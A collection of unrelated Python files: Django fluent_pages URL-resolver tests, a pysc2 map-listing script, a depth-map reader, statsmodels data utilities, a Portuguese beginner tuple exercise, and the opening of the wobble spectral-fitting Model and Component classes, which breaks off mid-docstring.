from fluent_pages.urlresolvers import app_reverse, mixed_reverse, PageTypeNotMounted, MultipleReverseMatch
class PluginTests(AppTestCase):
"""
Test cases for plugins
"""
@classmethod
def setUpTree(cls):
WebShopPage.objects.create(title="Shop1", slug="shop", status=WebShopPage.PUBLISHED, author=cls.user)
def test_app_page_urlconf(self):
"""
App pages should have an URL resolver, that returns the custom views.
"""
from fluent_pages.tests.testapp.page_type_plugins import WebShopPagePlugin
from fluent_pages.tests.testapp.urls_webshop import webshop_index
self.assertEqual(WebShopPagePlugin.urls, 'fluent_pages.tests.testapp.urls_webshop')
# See if the page points to the proper URL resolver
shop = WebShopPage.objects.all()[0]
resolver = shop.plugin.get_url_resolver()
self.assertIsNotNone(resolver, "App pages should have an URL resolver")
# See if the URL resolver returns the proper functions
match = resolver.resolve('/')
self.assertEqual(match.func, webshop_index)
# TODO: test more stuff.
# e.g. registration API, supported fields, expected available API functions
def test_app_reverse(self):
"""
The app_reverse function should find the proper CMS page where the app is mounted.
"""
self.assertEqual(WebShopPage.objects.published().count(), 1)
self.assertEqual(app_reverse('webshop_index'), '/shop/')
self.assertEqual(app_reverse('webshop_article', kwargs={'slug': 'foobar'}), '/shop/foobar/')
self.assertEqual(mixed_reverse('webshop_index'), '/shop/')
self.assertEqual(mixed_reverse('webshop_article', kwargs={'slug': 'foobar'}), '/shop/foobar/')
def test_app_reverse_multiple(self):
"""
The app_reverse functions should support multiple mount points for an app.
"""
shop2 = WebShopPage.objects.create(title="Shop2", slug="shop2", status=WebShopPage.PUBLISHED, author=self.user)
self.assertEqual(WebShopPage.objects.published().count(), 2)
# There are now 2 mount points, the functions should detect that
self.assertRaises(MultipleReverseMatch, lambda: app_reverse('webshop_index'))
self.assertRaises(MultipleReverseMatch, lambda: mixed_reverse('webshop_index'))
# The functions have a 'current_page' parameter that allows relative resolving.
# This is designed for template functions, to allow resolving relative to the current page node.
self.assertEqual(app_reverse('webshop_index', current_page=shop2), '/shop2/')
self.assertEqual(app_reverse('webshop_article', current_page=shop2, kwargs={'slug': 'foobar'}), '/shop2/foobar/')
self.assertEqual(mixed_reverse('webshop_index', current_page=shop2), '/shop2/')
self.assertEqual(mixed_reverse('webshop_article', current_page=shop2, kwargs={'slug': 'foobar'}), '/shop2/foobar/')
def test_app_reverse_multiple_language(self):
"""
The app_reverse functions should skip pages that are not translated in the current language.
"""
# Recreate models for clarity
for page in WebShopPage.objects.all():
page.delete() # Allow signals to be sent, and clear caches
WebShopPage.objects.language('en').create(title="Shop3-en", slug="shop3-en", status=WebShopPage.PUBLISHED, author=self.user)
WebShopPage.objects.language('fr').create(title="Shop4-fr", slug="shop4-fr", status=WebShopPage.PUBLISHED, author=self.user)
self.assertEqual(WebShopPage.objects.published().count(), 2)
# Depending on the language, multiple objects can be found.
# This tests whether _get_pages_of_type() properly filters the language.
self.assertEqual(app_reverse('webshop_index', language_code='en'), '/shop3-en/')
self.assertRaises(MultipleReverseMatch, lambda: app_reverse('webshop_index', language_code='fr'))
def test_app_reverse_unmounted(self):
"""
The app_reverse functions should raise an exception when the pagetype is not added in the page tree.
"""
for page in WebShopPage.objects.all():
page.delete() # Allow signals to be sent, and clear caches
self.assertEqual(WebShopPage.objects.published().count(), 0)
self.assertRaises(PageTypeNotMounted, lambda: app_reverse('webshop_index'))
self.assertRaises(PageTypeNotMounted, lambda: mixed_reverse('webshop_index'))
class PluginUrlTests(AppTestCase):
"""
Test for running a pagetype app standalone.
(some apps will support that, e.g. django-fluent-blogs)
"""
if django.VERSION < (1, 8):
urls = 'fluent_pages.tests.testapp.urls_webshop'
@override_settings(ROOT_URLCONF='fluent_pages.tests.testapp.urls_webshop')
def test_mixed_reverse_standalone(self):
"""
When a custom app is not hooked via the CMS page tree, mixed_reverse() should still work.
"""
self.assertRaises(PageTypeNotMounted, lambda: app_reverse('webshop_index'))
self.assertEqual(mixed_reverse('webshop_index'), '/')
self.assertEqual(mixed_reverse('webshop_article', kwargs={'slug': 'foobar'}), '/foobar/')
|
#!/usr/bin/python
# Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Print the list of available maps according to the game."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from ctools.pysc2 import run_configs
def main(unused_argv):
with run_configs.get().start(want_rgb=False) as controller:
available_maps = controller.available_maps()
print("\n")
print("Local map paths:")
for m in sorted(available_maps.local_map_paths):
print(" ", m)
print()
print("Battle.net maps:")
for m in sorted(available_maps.battlenet_map_names):
print(" ", m)
if __name__ == "__main__":
app.run(main)
|
#!/usr/bin/python
from PIL import Image
import numpy as np
def depth_read(filename):
# loads depth map D from png file
# and returns it as a numpy array,
# for details see readme.txt
depth_png = np.array(Image.open(filename), dtype=int)
# make sure we have a proper 16bit depth map here.. not 8bit!
assert(np.max(depth_png) > 255)
depth = depth_png.astype(np.float32) / 256.
depth[depth_png == 0] = -1.
return depth
|
'''
Utility functions models code
'''
import numpy as np
import numpy.lib.recfunctions as nprf
import numpy.linalg as L
from scipy.interpolate import interp1d
from scipy.linalg import svdvals
from statsmodels.distributions import (ECDF, monotone_fn_inverter,
StepFunction)
from statsmodels.tools.data import _is_using_pandas
from statsmodels.compatnp.py3k import asstr2
from pandas import DataFrame
def _make_dictnames(tmp_arr, offset=0):
"""
Helper function to create a dictionary mapping a column number
to the name in tmp_arr.
"""
col_map = {}
for i,col_name in enumerate(tmp_arr):
col_map.update({i+offset : col_name})
return col_map
def drop_missing(Y,X=None, axis=1):
"""
Returns views on the arrays Y and X where missing observations are dropped.
Y : array-like
X : array-like, optional
axis : int
Axis along which to look for missing observations. Default is 1, ie.,
observations in rows.
Returns
-------
Y : array
All Y where the
X : array
Notes
-----
If either Y or X is 1d, it is reshaped to be 2d.
"""
Y = np.asarray(Y)
if Y.ndim == 1:
Y = Y[:,None]
if X is not None:
X = np.array(X)
if X.ndim == 1:
X = X[:,None]
keepidx = np.logical_and(~np.isnan(Y).any(axis),~np.isnan(X).any(axis))
return Y[keepidx], X[keepidx]
else:
keepidx = ~np.isnan(Y).any(axis)
return Y[keepidx]
#TODO: needs to better preserve dtype and be more flexible
# ie., if you still have a string variable in your array you don't
# want to cast it to float
#TODO: add name validator (ie., bad names for datasets.grunfeld)
def categorical(data, col=None, dictnames=False, drop=False, ):
'''
Returns a dummy matrix given an array of categorical variables.
Parameters
----------
data : array
A structured array, recarray, or array. This can be either
a 1d vector of the categorical variable or a 2d array with
the column specifying the categorical variable specified by the col
argument.
col : 'string', int, or None
If data is a structured array or a recarray, `col` can be a string
that is the name of the column that contains the variable. For all
arrays `col` can be an int that is the (zero-based) column index
number. `col` can only be None for a 1d array. The default is None.
dictnames : bool, optional
If True, a dictionary mapping the column number to the categorical
name is returned. Used to have information about plain arrays.
drop : bool
Whether or not keep the categorical variable in the returned matrix.
Returns
--------
dummy_matrix, [dictnames, optional]
A matrix of dummy (indicator/binary) float variables for the
categorical data. If dictnames is True, then the dictionary
is returned as well.
Notes
-----
This returns a dummy variable for EVERY distinct variable. If a
a structured or recarray is provided, the names for the new variable is the
old variable name - underscore - category name. So if the a variable
'vote' had answers as 'yes' or 'no' then the returned array would have to
new variables-- 'vote_yes' and 'vote_no'. There is currently
no name checking.
Examples
--------
>>> import numpy as np
>>> import statsmodels.api as sm
Univariate examples
>>> import string
>>> string_var = [string.lowercase[0:5], string.lowercase[5:10], \
string.lowercase[10:15], string.lowercase[15:20], \
string.lowercase[20:25]]
>>> string_var *= 5
>>> string_var = np.asarray(sorted(string_var))
>>> design = sm.tools.categorical(string_var, drop=True)
Or for a numerical categorical variable
>>> instr = np.floor(np.arange(10,60, step=2)/10)
>>> design = sm.tools.categorical(instr, drop=True)
With a structured array
>>> num = np.random.randn(25,2)
>>> struct_ar = np.zeros((25,1), dtype=[('var1', 'f4'),('var2', 'f4'), \
('instrument','f4'),('str_instr','a5')])
>>> struct_ar['var1'] = num[:,0][:,None]
>>> struct_ar['var2'] = num[:,1][:,None]
>>> struct_ar['instrument'] = instr[:,None]
>>> struct_ar['str_instr'] = string_var[:,None]
>>> design = sm.tools.categorical(struct_ar, col='instrument', drop=True)
Or
>>> design2 = sm.tools.categorical(struct_ar, col='str_instr', drop=True)
'''
if isinstance(col, (list, tuple)):
try:
assert len(col) == 1
col = col[0]
except:
raise ValueError("Can only convert one column at a time")
#TODO: add a NameValidator function
# catch recarrays and structured arrays
if data.dtype.names or data.__class__ is np.recarray:
if not col and np.squeeze(data).ndim > 1:
raise IndexError("col is None and the input array is not 1d")
if isinstance(col, int):
col = data.dtype.names[col]
if col is None and data.dtype.names and len(data.dtype.names) == 1:
col = data.dtype.names[0]
tmp_arr = np.unique(data[col])
# if the cols are shape (#,) vs (#,1) need to add an axis and flip
_swap = True
if data[col].ndim == 1:
tmp_arr = tmp_arr[:,None]
_swap = False
tmp_dummy = (tmp_arr==data[col]).astype(float)
if _swap:
tmp_dummy = np.squeeze(tmp_dummy).swapaxes(1,0)
if not tmp_arr.dtype.names: # how do we get to this code path?
tmp_arr = [asstr2(item) for item in np.squeeze(tmp_arr)]
elif tmp_arr.dtype.names:
tmp_arr = [asstr2(item) for item in np.squeeze(tmp_arr.tolist())]
# prepend the varname and underscore, if col is numeric attribute lookup
# is lost for recarrays...
if col is None:
try:
col = data.dtype.names[0]
except:
col = 'var'
#TODO: the above needs to be made robust because there could be many
# var_yes, var_no varaibles for instance.
tmp_arr = [col + '_'+ item for item in tmp_arr]
#TODO: test this for rec and structured arrays!!!
if drop is True:
if len(data.dtype) <= 1:
if tmp_dummy.shape[0] < tmp_dummy.shape[1]:
tmp_dummy = np.squeeze(tmp_dummy).swapaxes(1,0)
dt = zip(tmp_arr, [tmp_dummy.dtype.str]*len(tmp_arr))
# preserve array type
return np.array(map(tuple, tmp_dummy.tolist()),
dtype=dt).view(type(data))
data=nprf.drop_fields(data, col, usemask=False,
asrecarray=type(data) is np.recarray)
data=nprf.append_fields(data, tmp_arr, data=tmp_dummy,
usemask=False, asrecarray=type(data) is np.recarray)
return data
# handle ndarrays and catch array-like for an error
elif data.__class__ is np.ndarray or not isinstance(data,np.ndarray):
if not isinstance(data, np.ndarray):
raise NotImplementedError("Array-like objects are not supported")
if isinstance(col, int):
offset = data.shape[1] # need error catching here?
tmp_arr = np.unique(data[:,col])
tmp_dummy = (tmp_arr[:,np.newaxis]==data[:,col]).astype(float)
tmp_dummy = tmp_dummy.swapaxes(1,0)
if drop is True:
offset -= 1
data = np.delete(data, col, axis=1).astype(float)
data = np.column_stack((data,tmp_dummy))
if dictnames is True:
col_map = _make_dictnames(tmp_arr, offset)
return data, col_map
return data
elif col is None and np.squeeze(data).ndim == 1:
tmp_arr = np.unique(data)
tmp_dummy = (tmp_arr[:,None]==data).astype(float)
tmp_dummy = tmp_dummy.swapaxes(1,0)
if drop is True:
if dictnames is True:
col_map = _make_dictnames(tmp_arr)
return tmp_dummy, col_map
return tmp_dummy
else:
data = np.column_stack((data, tmp_dummy))
if dictnames is True:
col_map = _make_dictnames(tmp_arr, offset=1)
return data, col_map
return data
else:
raise IndexError("The index %s is not understood" % col)
def _series_add_constant(data, prepend):
const = np.ones_like(data)
const.name = 'const'
if not prepend:
results = DataFrame([data, const]).T
results.columns = [data.name, 'const']
else:
results = DataFrame([const, data]).T
results.columns = ['const', data.name]
return results
def _dataframe_add_constant(data, prepend):
# check for const.
if np.any(data.var(0) == 1):
return data
if prepend:
data.insert(0, 'const', 1)
else:
data['const'] = 1
return data
def _pandas_add_constant(data, prepend):
from pandas import Series
if isinstance(data, Series):
return _series_add_constant(data, prepend)
else:
return _dataframe_add_constant(data, prepend)
#TODO: add an axis argument to this for sysreg
def add_constant(data, prepend=True):
'''
This appends a column of ones to an array if prepend==False.
For ndarrays and pandas.DataFrames, checks to make sure a constant is not
already included. If there is at least one column of ones then the
original object is returned. Does not check for a constant if a structured
or recarray is
given.
Parameters
----------
data : array-like
`data` is the column-ordered design matrix
prepend : bool
True and the constant is prepended rather than appended.
Returns
-------
data : array
The original array with a constant (column of ones) as the first or
last column.
'''
if _is_using_pandas(data, None):
# work on a copy
return _pandas_add_constant(data.copy(), prepend)
else:
data = np.asarray(data)
if not data.dtype.names:
var0 = data.var(0) == 0
if np.any(var0):
return data
data = np.column_stack((data, np.ones((data.shape[0], 1))))
if prepend:
return np.roll(data, 1, 1)
else:
return_rec = data.__class__ is np.recarray
if prepend:
ones = np.ones((data.shape[0], 1), dtype=[('const', float)])
data = nprf.append_fields(ones, data.dtype.names, [data[i] for
i in data.dtype.names], usemask=False, asrecarray=return_rec)
else:
data = nprf.append_fields(data, 'const', np.ones(data.shape[0]),
usemask=False, asrecarray = return_rec)
return data
def isestimable(C, D):
""" True if (Q, P) contrast `C` is estimable for (N, P) design `D`
From an Q x P contrast matrix `C` and an N x P design matrix `D`, checks if
the contrast `C` is estimable by looking at the rank of ``vstack([C,D])``
and verifying it is the same as the rank of `D`.
Parameters
----------
C : (Q, P) array-like
contrast matrix. If `C` has is 1 dimensional assume shape (1, P)
D: (N, P) array-like
design matrix
Returns
-------
tf : bool
True if the contrast `C` is estimable on design `D`
Examples
--------
>>> D = np.array([[1, 1, 1, 0, 0, 0],
... [0, 0, 0, 1, 1, 1],
... [1, 1, 1, 1, 1, 1]]).T
>>> isestimable([1, 0, 0], D)
False
>>> isestimable([1, -1, 0], D)
True
"""
C = np.asarray(C)
D = np.asarray(D)
if C.ndim == 1:
C = C[None, :]
if C.shape[1] != D.shape[1]:
raise ValueError('Contrast should have %d columns' % D.shape[1])
new = np.vstack([C, D])
if rank(new) != rank(D):
return False
return True
def recipr(X):
"""
Return the reciprocal of an array, setting all entries less than or
equal to 0 to 0. Therefore, it presumes that X should be positive in
general.
"""
x = np.maximum(np.asarray(X).astype(np.float64), 0)
return np.greater(x, 0.) / (x + np.less_equal(x, 0.))
def recipr0(X):
"""
Return the reciprocal of an array, setting all entries equal to 0
as 0. It does not assume that X should be positive in
general.
"""
test = np.equal(np.asarray(X), 0)
return np.where(test, 0, 1. / X)
def clean0(matrix):
"""
Erase columns of zeros: can save some time in pseudoinverse.
"""
colsum = np.add.reduce(matrix**2, 0)
val = [matrix[:,i] for i in np.flatnonzero(colsum)]
return np.array(np.transpose(val))
def rank(X, cond=1.0e-12):
"""
Return the rank of a matrix X based on its generalized inverse,
not the SVD.
"""
X = np.asarray(X)
if len(X.shape) == 2:
D = svdvals(X)
return int(np.add.reduce(np.greater(D / D.max(), cond).astype(np.int32)))
else:
return int(not np.alltrue(np.equal(X, 0.)))
def fullrank(X, r=None):
"""
Return a matrix whose column span is the same as X.
If the rank of X is known it can be specified as r -- no check
is made to ensure that this really is the rank of X.
"""
if r is None:
r = rank(X)
V, D, U = L.svd(X, full_matrices=0)
order = np.argsort(D)
order = order[::-1]
value = []
for i in range(r):
value.append(V[:,order[i]])
return np.asarray(np.transpose(value)).astype(np.float64)
StepFunction = np.deprecate(StepFunction,
old_name = 'statsmodels.tools.tools.StepFunction',
new_name = 'statsmodels.distributions.StepFunction')
monotone_fn_inverter = np.deprecate(monotone_fn_inverter,
old_name = 'statsmodels.tools.tools.monotone_fn_inverter',
new_name = 'statsmodels.distributions.monotone_fn_inverter')
ECDF = np.deprecate(ECDF,
old_name = 'statsmodels.tools.tools.ECDF',
new_name = 'statsmodels.distributions.ECDF')
def unsqueeze(data, axis, oldshape):
"""
Unsqueeze a collapsed array
>>> from numpy import mean
>>> from numpy.random import standard_normal
>>> x = standard_normal((3,4,5))
>>> m = mean(x, axis=1)
>>> m.shape
(3, 5)
>>> m = unsqueeze(m, 1, x.shape)
>>> m.shape
(3, 1, 5)
>>>
"""
newshape = list(oldshape)
newshape[axis] = 1
return data.reshape(newshape)
def chain_dot(*arrs):
"""
Returns the dot product of the given matrices.
Parameters
----------
arrs: argument list of ndarray
Returns
-------
Dot product of all arguments.
Example
-------
>>> import numpy as np
>>> from statsmodels.tools import chain_dot
>>> A = np.arange(1,13).reshape(3,4)
>>> B = np.arange(3,15).reshape(4,3)
>>> C = np.arange(5,8).reshape(3,1)
>>> chain_dot(A,B,C)
array([[1820],
[4300],
[6780]])
"""
return reduce(lambda x, y: np.dot(y, x), arrs[::-1])
def webuse(data, baseurl='http://www.stata-press.com/data/r11/', as_df=True):
"""
Parameters
----------
data : str
Name of dataset to fetch.
baseurl : str
The base URL to the stata datasets.
as_df : bool
If True, returns a `pandas.DataFrame`
Returns
-------
dta : Record Array
A record array containing the Stata dataset.
Examples
--------
>>> dta = webuse('auto')
Notes
-----
Make sure baseurl has trailing forward slash. Doesn't do any
error checking in response URLs.
"""
# lazy imports
from statsmodels.iolib import genfromdta
from urllib2 import urlopen
from urlparse import urljoin
from StringIO import StringIO
url = urljoin(baseurl, data+'.dta')
dta = urlopen(url)
#TODO: this isn't Python 3 compatibile since urlopen returns bytes?
dta = StringIO(dta.read()) # make it truly file-like
if as_df: # could make this faster if we don't process dta twice?
from pandas import DataFrame
return DataFrame.from_records(genfromdta(dta))
else:
return genfromdta(dta)
def nan_dot(A, B):
"""
Returns np.dot(left_matrix, right_matrix) with the convention that
nan * 0 = 0 and nan * x = nan if x != 0.
Parameters
----------
A, B : np.ndarrays
"""
# Find out who should be nan due to nan * nonzero
should_be_nan_1 = np.dot(np.isnan(A), (B != 0))
should_be_nan_2 = np.dot((A != 0), np.isnan(B))
should_be_nan = should_be_nan_1 + should_be_nan_2
# Multiply after setting all nan to 0
# This is what happens if there were no nan * nonzero conflicts
C = np.dot(np.nan_to_num(A), np.nan_to_num(B))
C[should_be_nan] = np.nan
return C
|
#Crie um programa que vai gerar cinco numeros aleatórios e colocar em uma tupla.
#Depois disso, mostre a listagem de numeros gerados e tambem indique o menor e o maior valor que estão na tupla.
from random import randrange
tupla = (randrange(0, 11), randrange(0, 11), randrange(0, 11), randrange(0, 11))
print(f'Os numeros gerados aleatoriamente são: {tupla}')
print(f'O menor numero {min(tupla)}')
print(f'O maior numero {max(tupla)}')
|
import numpy as np
from tqdm import tqdm
import sys
import tensorflow.compat.v1 as tf
import h5py
T = tf.float64
tf.disable_v2_behavior()
from .utils import bin_data, doppler, get_session
from .interp import interp
from .history import History
import os
pwd = os.path.dirname(os.path.realpath(__file__))+'/'
class Model(object):
"""
Keeps track of all components in the model.
Model is specific to order `r` of data object `data`.
Parameters
----------
data : `object`
a wobble Data object
results: `object`
a wobble Results object
r : `int`
the index of the order to be fit in Data
"""
def __init__(self, data, results, r):
self.components = []
self.component_names = []
self.data = data
self.results = results
self.r = r # order index
self.order = data.orders[r] # order number
def __repr__(self):
string = 'wobble.Model for order {0} consisting of the following components: '.format(self.order)
for i,c in enumerate(self.components):
string += '\n{0}: {1}; '.format(i, c.name)
if c.rvs_fixed:
string += 'RVs fixed; '
else:
string += 'RVs variable; '
string += '{0} variable basis components'.format(c.K)
return string
def add_component(self, name, starting_rvs, epochs=None, **kwargs):
"""
Append a new Component object to the model.
Parameters
----------
name : `str`
The name of the component. Must be unique.
starting_rvs : `np.ndarray`
N-epoch length vector of initial guesses for RVs; will be used
to stack & average data resids for initialization of the template.
epochs : `np.ndarray`
Indices between 0:N denoting epochs where this component is present
in the data. Defaults to all N epochs.
**kwargs : `dict`
Keywords to be passed to wobble.Component()
"""
if np.isin(name, self.component_names):
print("The model already has a component named {0}. Try something else!".format(name))
return
if epochs is None: # component is used in all data epochs by default
epoch_mask = np.ones(self.data.N, dtype='bool')
else:
epoch_mask = np.isin(np.arange(self.data.N), epochs)
starting_rvs[~epoch_mask] = np.nan # NaNs at unused epochs for initialization
c = Component(name, self.r, starting_rvs, epoch_mask, **kwargs)
self.components.append(c)
self.component_names.append(name)
if not np.isin(name, self.results.component_names):
self.results.add_component(c)
def add_star(self, name, starting_rvs=None, **kwargs):
"""
Convenience function to add a component with RVs initialized to zero
in the barycentric-corrected rest frame.
Will have regularization parameters and learning rates set to default values
for a stellar spectrum.
"""
if starting_rvs is None:
starting_rvs = -1. * np.copy(self.data.bervs) + np.mean(self.data.bervs)
kwargs['regularization_par_file'] = kwargs.get('regularization_par_file',
pwd+'regularization/default_star.hdf5')
kwargs['learning_rate_template'] = kwargs.get('learning_rate_template', 0.1)
self.add_component(name, starting_rvs, **kwargs)
def add_telluric(self, name, starting_rvs=None, **kwargs):
"""
Convenience function to add a component with RVs fixed to zero
in the observatory rest frame. Component contribution scales with airmass by default.
Will have regularization parameters and learning rates set to default values
for a telluric spectrum.
"""
if starting_rvs is None:
starting_rvs = np.zeros(self.data.N)
kwargs['learning_rate_template'] = kwargs.get('learning_rate_template', 0.01)
kwargs['scale_by_airmass'] = kwargs.get('scale_by_airmass', True)
kwargs['rvs_fixed'] = kwargs.get('rvs_fixed', True)
kwargs['regularization_par_file'] = kwargs.get('regularization_par_file',
pwd+'regularization/default_t.hdf5')
self.add_component(name, starting_rvs, **kwargs)
def add_continuum(self, degree, **kwargs):
"""Untested code for adding a continuum component."""
if np.isin("continuuum", self.component_names):
print("The model already has a continuum component.")
return
c = Continuum(self.r, self.data.N, degree, **kwargs)
self.components.append(c)
self.component_names.append(c.name)
if not np.isin(c.name, self.results.component_names):
self.results.add_component(c)
def initialize_templates(self):
"""Initialize spectral templates for all components.
*NOTE:* this will initialize each subsequent component from the residuals
of the previous, so make sure you have added the components in order of
largest to smallest contribution to the net spectrum.
"""
data_xs = self.data.xs[self.r]
data_ys = np.copy(self.data.ys[self.r])
data_ivars = np.copy(self.data.ivars[self.r])
assert False not in np.isfinite(data_xs), "Non-finite value(s) or NaN(s) in wavelengths."
assert False not in np.isfinite(data_ys), "Non-finite value(s) or NaN(s) in log spectral values."
assert False not in np.isfinite(data_ivars), "Non-finite value(s) or NaN(s) in inverse variance."
for c in self.components:
data_ys = c.initialize_template(data_xs, data_ys, data_ivars)
def setup(self):
"""Initialize component templates and do TensorFlow magic in prep for optimizing"""
#with tf.GradientTape() as gtape:
# So I think gtape needs to be a thing for all of this so it knows to watch these variables
self.initialize_templates()
self.synth = tf.zeros(np.shape(self.data.xs[self.r]), dtype=T, name='synth')
for c in self.components:
c.setup(self.data, self.r)
self.synth = tf.add(self.synth, c.synth, name='synth_add_{0}'.format(c.name))
self.nll = 0.5*tf.reduce_sum(tf.square(tf.constant(self.data.ys[self.r], dtype=T)
- self.synth, name='nll_data-model_sq')
* tf.constant(self.data.ivars[self.r], dtype=T), name='nll_reduce_sum')
for c in self.components:
self.nll = tf.add(self.nll, c.nll, name='nll_add_{0}'.format(c.name))
# Set up optimizers
self.updates = []
for c in self.components:
if not c.template_fixed:
c.dnll_dtemplate_ys = tf.gradients(self.nll, c.template_ys)
#c.dnll_dtemplate_ys = gtape.gradient(self.nll, c.template_ys)
c.opt_template = tf.train.AdamOptimizer(c.learning_rate_template).minimize(self.nll,
var_list=[c.template_ys], name='opt_minimize_template_{0}'.format(c.name))
self.updates.append(c.opt_template)
if not c.rvs_fixed:
c.dnll_drvs = tf.gradients(self.nll, c.rvs)
#c.dnll_drvs = gtape.gradient(self.nll, c.rvs)
c.opt_rvs = tf.train.AdamOptimizer(learning_rate=c.learning_rate_rvs,
epsilon=1.).minimize(self.nll,
var_list=[c.rvs], name='opt_minimize_rvs_{0}'.format(c.name))
self.updates.append(c.opt_rvs)
if c.K > 0:
c.opt_basis_vectors = tf.train.AdamOptimizer(c.learning_rate_basis).minimize(self.nll,
var_list=[c.basis_vectors], name='opt_minimize_basis_vectors_{0}'.format(c.name))
self.updates.append(c.opt_basis_vectors)
c.opt_basis_weights = tf.train.AdamOptimizer(c.learning_rate_basis).minimize(self.nll,
var_list=[c.basis_weights], name='opt_minimize_basis_weights_{0}'.format(c.name))
self.updates.append(c.opt_basis_weights)
session = get_session()
session.run(tf.global_variables_initializer())
def optimize(self, niter=100, save_history=False, basename='wobble',
movies=False, epochs_to_plot=[0,1,2], verbose=True,
rv_uncertainties=True, template_uncertainties=False, **kwargs):
"""Optimize the model!
Parameters
----------
niter : `int` (default `100`)
Number of iterations.
save_history : `bool` (default `False`)
If `True`, create a wobble History object to track progress across
iterations and generate plots.
movies : `bool` (default `False`)
Use with `save_history`; if `True`, will generate animations of
optimization progress.
epochs_to_plot : `list` (default `[0,1,2]`)
Use with `save_history`; indices of epochs to plot fits for. Each
epoch will generate its own plot/movies.
basename : `str` (default `wobble`)
Use with `save_history`; path/name stem to use when saving plots.
verbose : `bool` (default `True`)
Toggle print statements and progress bars.
rv_uncertainties : `bool` (default `True`)
Toggle whether RV uncertainty estimates should be calculated.
template_uncertainties : `bool` (default `False`)
Toggle whether template uncertainty estimates should be calculated.
"""
# initialize helper classes:
if save_history:
history = History(self, niter+1)
history.save_iter(self, 0)
# optimize:
session = get_session()
if verbose:
print("optimize: iterating through {0} optimization steps...".format(niter))
iterator = tqdm(range(niter), total=niter, miniters=int(niter/10))
else:
iterator = range(niter)
for i in iterator:
for c in self.components:
if not c.template_fixed:
session.run(c.opt_template, **kwargs)
for c in self.components:
if not c.rvs_fixed:
for _ in range(c.rv_opt_steps):
session.run(c.opt_rvs, **kwargs)
if save_history:
history.save_iter(self, i+1)
self.estimate_uncertainties(verbose=verbose, rvs=rv_uncertainties,
templates=template_uncertainties)
# copy over the outputs to Results:
for c in self.components:
self.results.update(c)
self.results.ys_predicted[self.r] = session.run(self.synth)
# save optimization plots:
if save_history:
history.save_plots(basename, movies=movies, epochs_to_plot=epochs_to_plot)
return history
def estimate_uncertainties(self, verbose=True, rvs=True, templates=False):
"""Estimate uncertainties using the second derivative of the likelihood.
Parameters
----------
verbose : `bool` (default `True`)
Toggle print statements and progress bars.
rvs : `bool` (default `True`)
Calculate uncertainties for rvs.
templates : `bool` (default `False`)
Calculate uncertainties for template_ys. (NOTE: this will take a while!)
"""
session = get_session()
for c in self.components:
attrs = []
ivar_attrs = []
epsilon = []
if rvs and not c.rvs_fixed:
attrs.append('rvs')
ivar_attrs.append('ivars_rvs') # TODO: make ivars names consistent
if templates and not c.template_fixed:
attrs.append('template_ys')
ivar_attrs.append('template_ivars')
for attr, ivar_attr in zip(attrs, ivar_attrs):
if attr == 'rvs':
epsilon = 10. # perturb by a few m/s - TODO: scale this with spectrum SNR!
else:
epsilon = 0.01 # perturb by 1%
best_values = session.run(getattr(c, attr))
N_var = len(best_values) # number of variables in attribute
N_grid = 5
if verbose:
print("optimize: calculating uncertainties on {0} {1}...".format(c.name, attr))
iterator = tqdm(range(N_var), total=N_var,
miniters=int(N_var/20))
else:
iterator = range(N_var)
for n in iterator: # get d2nll/drv2 from gradients
grid = np.tile(best_values, (N_grid,1))
grid[:,n] += np.linspace(-epsilon, epsilon, N_grid) # vary according to epsilon scale
dnll_dattr_grid = [session.run(getattr(c,'dnll_d{0}'.format(attr)),
feed_dict={getattr(c,attr):g})[0][n] for g in grid]
# fit a slope with linear algebra
A = np.array(grid[:,n]) - best_values[n]
ATA = np.dot(A, A)
ATy = np.dot(A, np.array(dnll_dattr_grid))
getattr(c,ivar_attr)[n] = ATy / ATA
# TODO: set ivars for basis vectors, basis weights
class Component(object):
"""
Generic class for an additive component in the spectral model.
You will probably never need to call this class directly.
Instead, use wobble.Model.add_component() to append an instance
of this object to the list saved as wobble.Model.components.
Parameters
----------
name : `str`
The name of the component. Must be unique within the model.
r : `int`
the index of the order to be fit in the data. Must be the same as
`Model.r`.
starting_rvs : `np.ndarray`
N-epoch length vector of initial guesses for RVs; will be used
to stack & average data resids for initialization of the template.
epoch_mask : `np.ndarray` of type `bool`
N-epoch mask where epoch_mask[n] = `True` indicates that this
component contributes to the model at epoch n.
rvs_fixed : `bool` (default `False`)
If `True`, fix the RVs to their initial values and do not
optimize.
template_fixed : `bool` (default `False`)
If `True`, fix the template to its initial values and do not
optimize.
rv_opt_steps : `int` (default `1`)
Number of times to step the RV optimizer every time the
template optimizer is stepped.
variable_bases : `int` (default `0`)
Number of basis vectors to use in time variability of `template_ys`.
If zero, no time variability is allowed.
scale_by_airmass : `bool` (default `False`)
If `True`, component contribution to the model scales linearly with
airmass.
template_xs : `np.ndarray` or `None` (default `None`)
Grid of x-values for the spectral template in the same units as
data `xs`. If `None`, generate automatically upon initialization.
template_ys : `np.ndarray` or `None` (default `None`)
Grid of starting guess y-values for the spectral template
in the same units as data `ys`.
If `None`, generate automatically upon initialization.
If not `None`, `template_xs` must be provided in the same shape.
initialize_at_zero : `bool` (default `False`)
If `True`, initialize template as a flat continuum. Equivalent to
providing a vector of zeros with `template_ys` keyword but does
not require passing a `template_xs` keyword.
learning_rate_rvs : `float` (default 1.)
Learning rate for Tensorflow Adam optimizer to use in `rvs`
optimization step.
learning_rate_template : `float` (default 0.01)
Learning rate for Tensorflow Adam optimizer to use in `template_ys`
optimization step.
learning_rate_basis : `float` (default 0.01)
Learning rate for Tensorflow Adam optimizer to use in `basis_vectors`
optimization step.
regularization_par_file : `str` or `None` (default `None`)
Name of HDF5 file containing the expected regularization amplitudes.
If keyword arguments are set for any of these amplitudes, that value
is used instead of file contents. If `None` & no keywords, no
regularization is used.
L1_template : `float` (default `0`)
L1 regularization amplitude on `self.template_ys`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
L2_template : `float` (default `0`)
L2 regularization amplitude on `self.template_ys`. If zero, no
regularization is used. If not explicitly specified and a valid
`regularization_par_file` is given, value from there is used.
L1_basis_vectors : `float` (default `0`)
L1 regularization amplitude on `self.basis_vectors`. If zero, no
